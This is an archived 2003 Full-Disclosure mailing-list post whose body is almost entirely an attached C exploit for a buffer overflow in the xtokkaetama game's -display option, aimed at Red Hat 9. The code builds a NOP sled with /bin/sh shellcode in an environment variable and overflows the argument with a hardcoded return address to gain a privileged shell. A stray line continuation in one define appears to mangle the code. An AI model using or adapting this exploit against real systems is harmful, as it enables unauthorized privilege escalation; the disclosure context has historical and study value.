'[Full-Disclosure] xtokkaetama Privilege Escalation Vulnerability Exploit(-display option)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-Disclosure] xtokkaetama Privilege Escalation Vulnerability Exploit(-display option)
From:       h2o thatspills <h2o_brahma () yahoo ! com>
Date:       2003-07-31 22:40:48
[Download RAW message or body]

Exploit Attached

__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
["exp-xtokkaetama.c" (application/octet-stream)]

/*
 *	lame xtokkaetama buffer overflow
 *		coded by brahma(31/07/2003)
 *	tested in RH 9.0
 *	greetz to all in #ihc, #india
 */

#include <stdlib.h>
#define RETADDR		0xbfffff11  
#define DEFAULT_BUFFER_SIZE              29
#define DEFAULT_EGG_SIZE                512 
#define NOP                            0x90
#define BIN 		"/usr/X11R6/bin/xtokkaetama"                                                      \
 char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
                                                                                
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}
                                                                                
void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;
                                                                                
  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) eggsize = atoi(argv[2]);
                                                                                
                                                                                
  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
                                                                                
  addr = RETADDR; 
  printf("Using address: 0x%x\n", addr);
                                                                                
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
                                                                                
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;
                                                                                
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
                                                                                
  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';
                                                                                
  memcpy(egg,"EGG=",4);
  putenv(egg);
  execl(BIN,BIN,"-display",buff,NULL);
}


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic